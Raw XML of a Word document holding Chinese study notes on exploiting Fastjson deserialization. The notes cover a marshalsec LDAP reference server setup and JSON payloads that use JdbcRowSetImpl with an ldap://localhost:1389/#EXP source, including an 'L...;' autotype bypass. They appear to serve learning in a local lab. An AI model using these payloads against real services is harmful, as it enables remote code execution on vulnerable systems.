      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D1EA3">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.LDAPRefServer http://127.0.0.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="007D1EA3">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r w:rsidRPr="007D1EA3">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/#EXP 1389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A547D5E" w14:textId="77777777" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3"/>
    <w:p w14:paraId="0F3977DF" w14:textId="79634651" w:rsidR="00571F88" w:rsidRDefault="005F06F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用marshalsec打开JNDI服务 连接本地开启的Http server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D0441A" w14:textId="67E104E8" w:rsidR="005F06F9" w:rsidRDefault="005F06F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是JNDI默认端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3985F485" w14:textId="30BEAD3C" w:rsidR="005F06F9" w:rsidRDefault="005F06F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是自己的http server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67C62A" w14:textId="77777777" w:rsidR="005F06F9" w:rsidRDefault="005F06F9"/>
    <w:p w14:paraId="50B43A29" w14:textId="187E6476" w:rsidR="005F06F9" w:rsidRDefault="005F06F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用Jdb</w:t>
      </w:r>
      <w:r w:rsidR="007D1EA3">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RowSetImpl构造poc</w:t>
      </w:r>
      <w:r w:rsidR="00AB31F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7D296" w14:textId="4AAC3441" w:rsidR="005F06F9" w:rsidRDefault="005F06F9">
      <w:r w:rsidRPr="005F06F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5D7FB9" wp14:editId="46A1B882">
            <wp:extent cx="5274310" cy="3360420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="404787845" name="图片 1" descr="电脑软件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87845" name="图片 1" descr="电脑软件截图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72A43" w14:textId="77777777" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="322C987E" w14:textId="24640AD5" w:rsidR="005F06F9" w:rsidRPr="00AB31F6" w:rsidRDefault="005F06F9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>介绍一下Jdb</w:t>
      </w:r>
      <w:r w:rsidR="007D1EA3" w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RowSetImpl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C90D312" w14:textId="250488F4" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>为什么使用Jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>RowSetImpl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC06067" w14:textId="77777777" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>因为这个@type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5928D2" w14:textId="0C32C60E" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>会自动调用set方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CB5B1" w14:textId="338489DC" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>JSON.parseObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>会自动调用set和get方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11FC9D" w14:textId="0EB19F82" w:rsidR="007D1EA3" w:rsidRDefault="00AB31F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>然后Jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>RowSetImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>类的set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DataSourceName()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>和set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>AutoCommit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>就可以被直接调用了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D062FB7" w14:textId="7F195C72" w:rsidR="00AB31F6" w:rsidRDefault="00AB31F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>就可以通过构造上述的po</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>自动执行他的set两个方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597CA0B" w14:textId="3B928BB5" w:rsidR="00AB31F6" w:rsidRPr="00AB31F6" w:rsidRDefault="00AB31F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>为什么选择这个类是因为这个类是sun包里自带的 不需要引入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C3371A" w14:textId="353D1051" w:rsidR="00AB31F6" w:rsidRDefault="00AB31F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>com.sun.rowset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.JdbcRowSetImpl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A0C9B" w14:textId="77777777" w:rsidR="00AB31F6" w:rsidRPr="00AB31F6" w:rsidRDefault="00AB31F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258C454E" w14:textId="77777777" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3"/>
    <w:p w14:paraId="39C0E0E7" w14:textId="1733B4B6" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到此都还没用到fastjson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2ED2F3" w14:textId="017F384C" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面只是可以利用Jdb</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RowSetImpl连接ldap 执行EXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DAFE0F" w14:textId="47137CB2" w:rsidR="007D1EA3" w:rsidRDefault="00AB31F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidR="007D1EA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用fastjson构造poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F909B5" w14:textId="77777777" w:rsidR="007D1EA3" w:rsidRPr="007D1EA3" w:rsidRDefault="007D1EA3" w:rsidP="007D1EA3">
      <w:r w:rsidRPr="007D1EA3">
        <w:t>{"@type":"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D1EA3">
        <w:t>com.sun.rowset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D1EA3">
        <w:t>.JdbcRowSetImpl","dataSourceName":"ldap://localhost:1389/#EXP", "autoCommit":true}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A77CFA" w14:textId="3BD4949C" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把原先的代码改成JSON的方式直接弹出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5563F595" w14:textId="4E60259D" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:r w:rsidRPr="007D1EA3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598FE5BB" wp14:editId="24AEC2F9">
            <wp:extent cx="5274310" cy="3264535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1501830657" name="图片 1" descr="电脑软件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830657" name="图片 1" descr="电脑软件截图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9FCB2" w14:textId="77777777" w:rsidR="00AB31F6" w:rsidRDefault="00AB31F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4B8DB2" w14:textId="51A38B76" w:rsidR="007D1EA3" w:rsidRPr="00AB31F6" w:rsidRDefault="007D1EA3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞源码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B5D2A5" w14:textId="0461D5CA" w:rsidR="007D1EA3" w:rsidRDefault="00615082">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>astjson里对传入的值都没有校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E7070" w14:textId="589E9EA0" w:rsidR="00615082" w:rsidRDefault="00615082">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615082">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58384C2C" wp14:editId="729A8804">
            <wp:extent cx="5274310" cy="976630"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1776107530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107530" name="图片 1" descr="图形用户界面, 文本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A347" w14:textId="77777777" w:rsidR="00615082" w:rsidRDefault="00615082">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED1C202" w14:textId="77777777" w:rsidR="00615082" w:rsidRDefault="00615082">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05078C7C" w14:textId="20CA30F6" w:rsidR="00615082" w:rsidRDefault="00615082">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615082">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF84B3" w14:textId="5F894D8F" w:rsidR="00672C17" w:rsidRDefault="00615082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1.2.25</w:t>
      </w:r>
      <w:r w:rsidR="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就不支持</w:t>
      </w:r>
      <w:r w:rsidR="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r w:rsidR="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidR="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F1AFD" w14:textId="2E34232F" w:rsidR="00672C17" w:rsidRDefault="00672C1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需要手动开启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E75D9AD" w14:textId="7AD5D880" w:rsidR="00672C17" w:rsidRDefault="00672C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ParserConfig.getGlobalInstance(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).setAutoTypeSupport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47334FBD" w14:textId="01DC6FDE" w:rsidR="00672C17" w:rsidRDefault="00672C1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后期源码中</w:t>
      </w:r>
      <w:r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@Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>字段开头是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ”[“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，另一种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“L”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开头与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“;”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>结尾，他就会从第二个字符获取我们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC88BAE" w14:textId="4BE67EE2" w:rsidR="00672C17" w:rsidRDefault="00672C1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构造新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043A7EB" w14:textId="77777777" w:rsidR="00672C17" w:rsidRPr="00672C17" w:rsidRDefault="00672C17" w:rsidP="00672C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ParserConfig.getGlobalInstance(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).setAutoTypeSupport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8DC520" w14:textId="77777777" w:rsidR="00672C17" w:rsidRPr="00672C17" w:rsidRDefault="00672C17" w:rsidP="00672C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">        String exp = "{\"@type\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>":\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"Lcom.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"ldap://localhost:1389/#EXP\", \"autoCommit\":true}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE0EC77" w14:textId="2FD045E7" w:rsidR="00672C17" w:rsidRDefault="00672C17" w:rsidP="00672C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">        JSON.parseObject(exp);</w:t>
      </w:r>
      <w:r w:rsidRPr="00672C17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CAB3C71" wp14:editId="1369245E">
            <wp:extent cx="5274310" cy="3328670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1969960234" name="图片 1" descr="电脑软件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960234" name="图片 1" descr="电脑软件的截图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635EA" w14:textId="77777777" w:rsidR="00672C17" w:rsidRDefault="00672C17" w:rsidP="00672C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F8D542" w14:textId="0CF53705" w:rsidR="00672C17" w:rsidRDefault="00672C17" w:rsidP="00672C1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还有别的版本绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D52835E" w14:textId="77777777" w:rsidR="00672C17" w:rsidRPr="00672C17" w:rsidRDefault="00672C17" w:rsidP="00672C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00672C17" w:rsidRPr="00672C1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ource Code Pro">
    <w:panose1 w:val="020B0509030403020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="200002F7" w:usb1="020038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1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6158"/>
    <w:rsid w:val="00177B8A"/>
    <w:rsid w:val="004B6158"/>
    <w:rsid w:val="00571F88"/>
    <w:rsid w:val="005A1CB5"/>
    <w:rsid w:val="005F06F9"/>
    <w:rsid w:val="00615082"/>
    <w:rsid w:val="006248E9"/>
    <w:rsid w:val="006618F6"/>
    <w:rsid w:val="00672C17"/>
    <w:rsid w:val="00722C87"/>
    <w:rsid w:val="007D1EA3"/>
    <w:rsid w:val="008B738E"/>
